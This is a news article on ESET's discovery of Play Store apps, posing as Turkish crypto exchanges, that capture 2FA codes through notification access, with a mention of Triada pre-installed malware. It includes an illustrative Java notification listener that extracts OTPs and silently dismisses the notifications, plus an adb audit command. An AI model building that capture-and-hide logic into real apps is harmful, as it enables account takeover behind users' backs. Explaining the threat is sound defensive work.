Android Phones in Danger: Not Even 2FA Can Stop the New Malware
Online threats are becoming more sophisticated, and the built-in protections of modern devices no longer reliably stop them. This is especially true for Android phones, as recent research reports show.
Several weeks ago, Google admitted that a number of low-end Android devices had shipped with pre-installed malware. In the same period, researchers uncovered malware on the Google Play Store that can bypass Google's new permission restrictions if
The discovery was made by ESET researchers and published on the company's WeLiveSecurity blog. They showed that certain apps available on the Play Store circumvent Google's restrictions: although the apps never obtain the SMS permission, they still read the OTPs (one-time passwords) delivered in SMS-based 2FA (two-factor authentication) messages, so the second factor does not stop them. There is also evidence that the same technique can capture OTPs sent by email.
Google has struggled with malicious apps for a long time. Every so often the company removes dozens of newly discovered apps from the Play Store for malicious behaviour. Then, in March of this year, it restricted which Android apps may request the Call Log and SMS permissions, in the hope of stopping apps from stealing user credentials and bypassing 2FA.
As many are likely aware, 2FA is an additional security layer: besides the password, the user must receive and enter a short code to sign in. These codes, known as one-time passwords (OTPs), are delivered by email or, more often, by SMS.
This was considered a good solution, and for a long while it was. Things changed when attackers began publishing malicious apps that requested the SMS permission. Most users grant permission prompts without reading them, so many allowed it; the apps could then read incoming messages, forward the OTPs to the attackers and use them, bypassing 2FA.
Google reacted by restricting which apps may request that permission, and now it appears that this protection is circumvented by a new malware. The app ESET analysed impersonates BtcTurk, a Turkey-based cryptocurrency exchange, and phishes the victim's login credentials for the real service.
In other words, instead of intercepting SMS messages directly, the malicious app asks for notification access, a separate permission that the SMS restriction does not cover. With it, the app receives the content of every notification shown on the device, including the one the messaging app posts when the OTP arrives, and extracts the code from it. It can also dismiss that notification as soon as it has the code, so the user never sees it and does not realise what is happening.
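To make the mechanism concrete, the following is an added illustration written for this article, not ESET's code and not code recovered from the malware. It shows the Android API the technique relies on: a NotificationListenerService is handed every notification the system posts, can read its title and text, and can cancel it. The package name, class name and the OTP pattern are assumptions; the service only runs once the user has granted the app "notification access" in Settings, and no SMS permission is involved.

```java
// Added example for this article (not ESET's or the malware's code).
// Package and class names are hypothetical.
package com.example.otplistener;

import android.app.Notification;
import android.os.Bundle;
import android.service.notification.NotificationListenerService;
import android.service.notification.StatusBarNotification;
import android.util.Log;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

/*
 * The service must be declared in AndroidManifest.xml, and the user must
 * enable it under the "Notification access" screen in Settings before the
 * system binds to it:
 *
 *   <service android:name=".OtpNotificationListener"
 *       android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
 *       <intent-filter>
 *           <action android:name="android.service.notification.NotificationListenerService"/>
 *       </intent-filter>
 *   </service>
 */
public class OtpNotificationListener extends NotificationListenerService {
    private static final String TAG = "OtpListener";

    // Assumed shape of an SMS/email OTP: a run of 4 to 8 digits not adjoining
    // other digits (so a phone number or a year is not mistaken for a code).
    private static final Pattern OTP = Pattern.compile("(?<!\\d)(\\d{4,8})(?!\\d)");

    // Called by the system for every notification posted by any app,
    // including the messaging app's "new SMS" notification.
    @Override
    public void onNotificationPosted(StatusBarNotification sbn) {
        Notification n = sbn.getNotification();
        if (n == null || n.extras == null) return;

        Bundle extras = n.extras;
        CharSequence bigText = extras.getCharSequence(Notification.EXTRA_BIG_TEXT);
        CharSequence text = extras.getCharSequence(Notification.EXTRA_TEXT);
        CharSequence body = bigText != null ? bigText : text;
        if (body == null) return;

        String code = extractCode(body.toString());
        if (code == null) return;

        // A real sample would send the code to the attacker here; this
        // illustration only logs it locally.
        Log.d(TAG, "OTP " + code + " seen in notification from " + sbn.getPackageName());

        // Dismiss the notification immediately so the user never sees the
        // code arrive (API 21+; sbn.getKey() identifies this notification).
        cancelNotification(sbn.getKey());
    }

    // Returns the first OTP-looking digit run in the text, or null.
    static String extractCode(String body) {
        Matcher m = OTP.matcher(body);
        return m.find() ? m.group(1) : null;
    }
}
```

The defensive takeaway is that notification access is a separate, user-granted capability, so the list of apps holding it is worth auditing: on a device you can read it with `adb shell settings get secure enabled_notification_listeners` (a colon-separated list of service components), or through the Notification access screen in Settings, and anything other than a known accessibility or companion app there deserves a closer look.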
More such techniques are likely to appear in the future, but this is still an important finding, as it is the first malware ESET has seen that gets around Google's new restrictions. The malware has already spread across multiple apps. BTCTurk Pro Beta was the first to be found; it had been downloaded around 50 times before the researchers discovered it.
Another app with the same name then appeared, uploaded by a different developer account. Google removed that one too, and the attacker uploaded a third app with the same function and the same malware. Researchers believe the technique has been refined with each new app.
Then, only a week ago, researchers were alerted to another potentially malicious app, this one impersonating Koineks, another Turkish crypto exchange. It uses the same technique, and further analysis indicates that it comes from the same actor. The researchers' conclusion is that the attackers are likely testing the malware, which is evolving and getting better at obtaining OTPs without reading or stealing SMS messages at all.
As mentioned earlier, the announcement of the new OTP-stealing method came only a few days after Google stated that some low-end Android devices had shipped with pre-installed malware. The company discussed the malware, known as Triada, in detail and confirmed that devices from Doogee, Leagoo and Cherry Mobile had it pre-installed. Triada was first described by Kaspersky Lab in 2016. It now gets onto phones during manufacturing: according to Google, attackers compromised a third party in the production process and used that access to plant a backdoor in a number of phones, yet another threat to users' security.